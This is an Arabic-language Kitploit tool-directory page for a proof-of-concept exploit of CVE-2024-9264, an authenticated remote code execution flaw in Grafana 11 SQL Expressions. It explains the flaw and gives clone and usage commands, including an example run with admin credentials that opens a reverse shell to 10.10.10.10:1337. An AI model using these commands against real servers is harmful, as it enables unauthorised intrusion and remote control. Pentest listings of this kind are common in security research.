Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9264 — RCE مُصادَق عليه في Grafana (v11.0) عبر SQL Expressions - استغلال PoC | Kitploit
أدوات/GitHubGitHub/rvzsec/cve-2024-9264
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubrvzsec/cve-2024-9264

CVE-2024-9264

RCE مُصادَق عليه في Grafana (v11.0) عبر SQL Expressions - استغلال PoC

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9264

استغلال RCE مُوثَّق في Grafana (v11.0) عبر SQL Expressions - استغلال PoC



الشعار

CVE-2024-9264 - Grafana v11.0
تنفيذ الأكواد عن بُعد معتمد الهوية (RCE)

PoC


مقدمة

CVE-2024-9264 هو ثغرة حرجة من نوع تنفيذ الأكواد عن بُعد وتضمين الملفات المحلية، أُدخلت في ميزة "SQL Expressions" التجريبية في Grafana 11. تمرّر الواجهة البرمجية استعلامات SQL المقدمة من المستخدم مباشرةً إلى واجهة أوامر DuckDB دون تعقيمٍ كافٍ، لذا يمكن لأي حساب مصادق بصلاحيات Viewer أو أعلى حقن أوامر الصدفة أو قراءة ملفات عشوائية، بشرط أن يكون ملف duckdb الثنائي في PATH الخاص بالخادم.


الاستخدام

root@kitploit:~
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>

مثال:

root@kitploit:~
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
تنزيل الأداة